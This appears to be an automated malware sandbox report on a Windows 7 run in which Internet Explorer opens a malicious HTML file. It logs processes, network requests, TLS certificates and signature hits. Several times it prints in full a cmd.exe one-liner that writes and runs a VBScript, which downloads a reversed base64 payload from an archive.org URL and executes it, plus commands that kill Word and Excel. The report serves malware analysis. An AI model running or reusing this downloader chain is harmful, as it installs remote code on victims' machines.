Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | April 30, 2021, 9:43 a.m. | April 30, 2021, 9:46 a.m. |
-
iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\divine11111.html
1684-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs
604-
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\SiggiaW.vbs"
240
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
1396-
taskkill.exe taskkill /f /im winword.exe
2892 -
taskkill.exe taskkill /f /im EXCEL.exe
2824
-
-
-
IP Address | Status | Action |
---|---|---|
142.250.204.105 | Active | Moloch |
142.250.66.141 | Active | Moloch |
142.250.66.35 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.217.161.131 | Active | Moloch |
172.217.163.234 | Active | Moloch |
172.217.163.238 | Active | Moloch |
172.217.24.68 | Active | Moloch |
172.217.31.233 | Active | Moloch |
207.241.228.148 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49203 142.250.204.105:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com | cd:e9:14:68:0a:ac:07:cd:40:f5:7b:ce:17:3c:51:77:02:35:24:96 |
TLSv1 192.168.56.101:49218 172.217.163.234:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=upload.video.google.com | c2:b5:f0:1b:46:55:3f:d3:65:b2:1d:5c:cc:56:a7:41:ac:9c:7a:22 |
TLSv1 192.168.56.101:49210 142.250.204.105:443 |
None | None | None |
TLSv1 192.168.56.101:49213 142.250.66.141:443 |
None | None | None |
TLSv1 192.168.56.101:49202 142.250.204.105:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com | cd:e9:14:68:0a:ac:07:cd:40:f5:7b:ce:17:3c:51:77:02:35:24:96 |
TLSv1 192.168.56.101:49238 142.250.66.35:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.gstatic.com | 36:ae:4f:16:79:a7:78:df:85:88:67:19:ae:c4:52:de:e4:11:9d:0a |
TLSv1 192.168.56.101:49216 172.217.24.68:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=www.google.com | f0:48:7a:59:65:34:33:f8:a1:92:c6:c4:fb:9a:cc:c5:ad:0c:b3:e2 |
TLSv1 192.168.56.101:49206 172.217.31.233:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com | 6d:15:a5:86:b1:43:d2:08:12:2b:dd:b8:2b:a2:75:1c:17:14:4f:37 |
TLSv1 192.168.56.101:49207 172.217.31.233:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com | 6d:15:a5:86:b1:43:d2:08:12:2b:dd:b8:2b:a2:75:1c:17:14:4f:37 |
TLSv1 192.168.56.101:49227 207.241.228.148:443 |
C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http://certs.godaddy.com/repository/, CN=Go Daddy Secure Certificate Authority - G2 | OU=Domain Control Validated, CN=*.us.archive.org | 9c:3c:d6:6d:65:69:f2:95:8c:99:48:e3:e0:7f:14:38:36:4c:ba:d0 |
TLSv1 192.168.56.101:49208 172.217.31.233:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com | 6d:15:a5:86:b1:43:d2:08:12:2b:dd:b8:2b:a2:75:1c:17:14:4f:37 |
TLSv1 192.168.56.101:49211 142.250.66.141:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=accounts.google.com | 98:df:6a:f4:57:e5:03:e8:93:b6:cd:64:64:80:1c:e1:62:2b:e6:3d |
TLSv1 192.168.56.101:49205 142.250.204.105:443 |
None | None | None |
TLSv1 192.168.56.101:49212 142.250.66.141:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=accounts.google.com | 98:df:6a:f4:57:e5:03:e8:93:b6:cd:64:64:80:1c:e1:62:2b:e6:3d |
TLSv1 192.168.56.101:49215 172.217.24.68:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=www.google.com | f0:48:7a:59:65:34:33:f8:a1:92:c6:c4:fb:9a:cc:c5:ad:0c:b3:e2 |
TLSv1 192.168.56.101:49241 142.250.66.35:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.gstatic.com | 36:ae:4f:16:79:a7:78:df:85:88:67:19:ae:c4:52:de:e4:11:9d:0a |
TLSv1 192.168.56.101:49219 172.217.163.234:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=upload.video.google.com | c2:b5:f0:1b:46:55:3f:d3:65:b2:1d:5c:cc:56:a7:41:ac:9c:7a:22 |
TLSv1 192.168.56.101:49220 172.217.163.238:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google-analytics.com | 89:50:23:ba:60:4a:63:86:5b:f0:29:b0:34:26:70:1d:84:e2:99:da |
TLSv1 192.168.56.101:49221 172.217.163.238:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google-analytics.com | 89:50:23:ba:60:4a:63:86:5b:f0:29:b0:34:26:70:1d:84:e2:99:da |
TLSv1 192.168.56.101:49230 172.217.161.131:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.gstatic.com | 4e:d0:50:7d:a9:83:46:39:e3:46:b9:b5:04:27:23:4e:45:0d:da:f8 |
TLSv1 192.168.56.101:49229 172.217.161.131:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.gstatic.com | 4e:d0:50:7d:a9:83:46:39:e3:46:b9:b5:04:27:23:4e:45:0d:da:f8 |
TLSv1 192.168.56.101:49239 142.250.66.35:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.gstatic.com | 36:ae:4f:16:79:a7:78:df:85:88:67:19:ae:c4:52:de:e4:11:9d:0a |
TLSv1 192.168.56.101:49240 142.250.66.35:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.gstatic.com | 36:ae:4f:16:79:a7:78:df:85:88:67:19:ae:c4:52:de:e4:11:9d:0a |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
request | GET https://www.blogger.com/static/v1/widgets/115981500-css_bundle_v2.css |
request | GET https://www.blogger.com/static/v1/jsbin/1277698886-ieretrofit.js |
request | GET https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9202096335134795169&zx=b73d5666-d098-4854-a4dd-8e948356adfd |
request | GET https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js |
request | GET https://www.blogger.com/static/v1/widgets/1564291244-widgets.js |
request | GET https://resources.blogblog.com/img/icon18_edit_allbkg.gif |
request | GET https://resources.blogblog.com/img/icon18_wrench_allbkg.png |
request | GET https://www.blogger.com/blogin.g?blogspotURL=https://yahameinhunbusorkoinai.blogspot.com/p/divine11111.html&type=blog |
request | GET https://www.blogger.com/comment-iframe.g?blogID=9202096335134795169&pageID=7898695459195786984&blogspotRpcToken=6920501 |
request | GET https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png |
request | GET https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png |
request | GET https://www.blogger.com/img/share_buttons_20_3.png |
request | GET https://accounts.google.com/ServiceLogin?continue=https://www.blogger.com/comment-iframe.g?blogID%3D9202096335134795169%26pageID%3D7898695459195786984%26blogspotRpcToken%3D6920501%26bpli%3D1&followup=https://www.blogger.com/comment-iframe.g?blogID%3D9202096335134795169%26pageID%3D7898695459195786984%26blogspotRpcToken%3D6920501%26bpli%3D1&passive=true&go=true |
request | GET https://accounts.google.com/ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://yahameinhunbusorkoinai.blogspot.com/p/divine11111.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://yahameinhunbusorkoinai.blogspot.com/p/divine11111.html%26type%3Dblog%26bpli%3D1&passive=true&go=true |
request | GET https://www.blogger.com/comment-iframe.g?blogID=9202096335134795169&pageID=7898695459195786984&blogspotRpcToken=6920501&bpli=1 |
request | GET https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fyahameinhunbusorkoinai.blogspot.com%2Fp%2Fdivine11111.html&type=blog&bpli=1 |
request | GET https://www.blogger.com/static/v1/v-css/2621646369-cmtfp.css |
request | GET https://www.blogger.com/static/v1/jsbin/3544430843-cmt__en_gb.js |
request | GET https://resources.blogblog.com/img/blank.gif |
request | GET https://www.google.com/js/bg/EfeN22x02mrXR2DvFCZCzjwoiB7Lz_xW9gt2gw51u7c.js |
request | GET https://www.google.com/css/maia.css |
request | GET https://www.blogger.com/static/v1/v-css/281434096-static_pages.css |
request | GET https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js |
request | GET https://fonts.googleapis.com/css?family=Open+Sans:300 |
request | GET https://www.google-analytics.com/analytics.js |
request | GET https://ia801408.us.archive.org/25/items/defender_202103/defender.txt |
request | GET https://fonts.gstatic.com/s/opensans/v18/mem5YaGs126MiZpBA-UN_r8OUuhv.woff |
request | GET https://www.blogger.com/comment-iframe-bg.g?bgresponse=js_disabled&iemode=9&page=1&bgint=EfeN22x02mrXR2DvFCZCzjwoiB7Lz_xW9gt2gw51u7c |
request | GET https://www.blogger.com/img/blogger-logotype-color-black-1x.png |
request | GET https://resources.blogblog.com/img/anon36.png |
request | GET https://fonts.googleapis.com/css?lang=ko&family=Product+Sans|Roboto:400,700 |
request | GET https://fonts.gstatic.com/s/roboto/v27/KFOmCnqEu92Fr1Mu4mxM.woff |
request | GET https://fonts.gstatic.com/s/roboto/v27/KFOlCnqEu92Fr1MmWUlfBBc-.woff |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\3858658042-comment_from_post_iframe[1].js |
file | C:\Users\Public\SiggiaW.vbs |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\3544430843-cmt__en_gb[1].js |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\analytics[2].js |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\3101730221-analytics_autotrack[1].js |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\EfeN22x02mrXR2DvFCZCzjwoiB7Lz_xW9gt2gw51u7c[1].js |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\1277698886-ieretrofit[1].js |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\1564291244-widgets[1].js |
cmdline | "C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs |
cmdline | "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EXCEL.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "winword.exe") |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | cmd /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe |
cmdline | taskkill /f /im winword.exe |
cmdline | "C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs |
cmdline | taskkill /f /im EXCEL.exe |
cmdline | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1684 CREDAT:145409 |
cmdline | "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe |
cmdline | cMd /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs |
file | C:\Users\Public\SiggiaW.vbs |
parent_process | iexplore.exe | martian_process | cmd /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob |
parent_process | iexplore.exe | martian_process | "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe | ||||||
parent_process | iexplore.exe | martian_process | cMd /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs | ||||||
parent_process | iexplore.exe | martian_process | "C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo 